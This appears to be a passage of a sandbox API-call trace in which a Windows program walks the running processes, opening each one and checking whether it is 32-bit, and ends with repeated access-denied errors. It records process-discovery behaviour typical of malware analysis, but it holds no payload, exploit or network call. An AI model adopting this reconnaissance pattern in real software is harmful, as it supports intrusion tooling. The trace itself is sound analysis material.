	[0072.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.434] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.434] CloseHandle (hObject=0x224) returned 1
	[0072.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.434] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.434] CloseHandle (hObject=0x224) returned 1
	[0072.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.435] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.435] CloseHandle (hObject=0x224) returned 1
	[0072.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.435] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.435] CloseHandle (hObject=0x224) returned 1
	[0072.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.435] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.435] CloseHandle (hObject=0x224) returned 1
	[0072.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.435] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.435] CloseHandle (hObject=0x224) returned 1
	[0072.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.436] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.436] CloseHandle (hObject=0x224) returned 1
	[0072.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.436] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.436] CloseHandle (hObject=0x224) returned 1
	[0072.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.436] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.436] CloseHandle (hObject=0x224) returned 1
	[0072.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.437] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.437] CloseHandle (hObject=0x224) returned 1
	[0072.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.437] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.437] CloseHandle (hObject=0x224) returned 1
	[0072.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.437] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.437] CloseHandle (hObject=0x224) returned 1
	[0072.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728878, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.437] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.437] CloseHandle (hObject=0x224) returned 1
	[0072.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dca0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.438] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.438] CloseHandle (hObject=0x224) returned 1
	[0072.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.438] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.438] CloseHandle (hObject=0x224) returned 1
	[0072.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e7c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.438] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.438] CloseHandle (hObject=0x224) returned 1
	[0072.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.438] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.438] CloseHandle (hObject=0x224) returned 1
	[0072.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.438] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.439] CloseHandle (hObject=0x224) returned 1
	[0072.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.439] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.439] CloseHandle (hObject=0x224) returned 1
	[0072.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728878, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.439] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.439] CloseHandle (hObject=0x224) returned 1
	[0072.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.439] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.439] CloseHandle (hObject=0x224) returned 1
	[0072.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.439] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.439] CloseHandle (hObject=0x224) returned 1
	[0072.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.440] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.440] CloseHandle (hObject=0x224) returned 1
	[0072.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e6d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.440] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.440] CloseHandle (hObject=0x224) returned 1
	[0072.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.440] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.440] CloseHandle (hObject=0x224) returned 1
	[0072.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.440] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.440] CloseHandle (hObject=0x224) returned 1
	[0072.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.440] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.440] CloseHandle (hObject=0x224) returned 1
	[0072.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.441] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.441] CloseHandle (hObject=0x224) returned 1
	[0072.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728978, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.441] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.441] CloseHandle (hObject=0x224) returned 1
	[0072.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e720, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.441] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.441] CloseHandle (hObject=0x224) returned 1
	[0072.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e770, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.441] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.441] CloseHandle (hObject=0x224) returned 1
	[0072.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.442] GetLastError () returned 0x5
	[0072.443] GetLastError () returned 0x5
